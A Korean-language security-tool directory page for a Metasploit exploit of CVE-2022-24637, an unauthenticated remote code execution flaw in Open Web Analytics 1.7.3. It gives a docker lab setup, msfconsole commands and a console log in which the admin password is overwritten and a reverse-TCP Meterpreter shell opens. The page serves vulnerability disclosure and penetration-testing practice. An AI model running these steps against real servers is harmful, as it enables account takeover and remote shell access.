Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-24637 — Open Web Analytics 1.7.3 - 원격 코드 실행 | Kitploit
도구/GitHubGitHub/pflegusch/cve-2022-24637
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubpflegusch/cve-2022-24637

CVE-2022-24637

Open Web Analytics 1.7.3 - 원격 코드 실행

저장소 보기
43년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

취약 애플리케이션

Open Web Analytics(OWA) 1.7.4 이전 버전에서는 인증되지 않은 원격 공격자가 민감한 사용자 정보를 획득할 수 있으며, 이는 캐시 해시를 활용하여 관리자 권한을 획득하는 데 사용될 수 있습니다. 이 취약점은 의도된 "<?php 시퀀스 대신 '<?php로 생성된 파일이 PHP 인터프리터에 의해 처리되지 않기 때문에 발생합니다.

검증 단계

  1. docker를 사용하여 취약한 OWA 인스턴스를 시작합니다

    • https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml을 다운로드합니다
    • 컨테이너를 시작합니다: docker compose up -d
    • http://127.0.0.1:80/을 엽니다
    • docker-compose.yml 파일의 환경 변수를 사용하여 설치 단계를 따릅니다
      • 공개 URL: http://127.0.0.1/
      • 데이터베이스 호스트(docker inspect <db-container>를 실행하여 IPAddress 확인, 예: 172.22.0.2)
      • 데이터베이스 포트: 3306
      • 데이터베이스 이름: owa
      • 데이터베이스 사용자: owa
      • 데이터베이스 비밀번호: Demo12+#
      • 계속
      • 사이트 도메인: http://127.0.0.1
      • 관리자 이름: admin
      • 이메일: [email protected]
      • 비밀번호: Demo12+#
      • 계속
  2. msfconsole을 시작합니다

  3. use exploit/multi/http/open_web_analytics_rce

  4. set RHOSTS 127.0.0.1

  5. set RPORT 80

  6. set SSL false

  7. set LHOST 172.22.0.1 -> 이 값은 docker compose up -d 명령으로 생성된 브리지 IP여야 합니다

  8. check

  9. run

옵션

Password

대상 익스플로잇 시, 공격 대상 사용자의 비밀번호가 이 비밀번호로 덮어써집니다.

Username

이 익스플로잇의 공격 대상이 되는 사용자입니다.

고급 옵션

SearchLimit

이 익스플로잇은 로그인을 시도할 때 각 사용자에 대해 생성되는 캐시 파일에서 temp_passkey 값을 검색하여 작동합니다. /owa-data/caches/ 디렉터리는 공개적으로 접근 가능하므로 이러한 캐시 파일을 검색할 수 있습니다. 캐시 파일의 정확한 경로는 user_id에 따라 달라지며, 이를 통해 계산할 수 있습니다. 이 옵션은 0부터 시작하여 temp_passkey 값이 포함된 캐시 파일을 검사할 계산 경로의 수를 정의합니다.

시나리오

위에서 설명한 docker 배포를 사용한 버전 1.7.3

root@kitploit:~
msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
LHOST => 172.22.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > run

[*] Started reverse TCP handler on 172.22.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 172.22.0.3
[+] Deleted QY0yivK4.php
[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
[+] Triggering payload! Check your listener!

meterpreter > pwd
/var/www/html/owa-data/caches
meterpreter > getuid
Server username: www-data
meterpreter >
도구 다운로드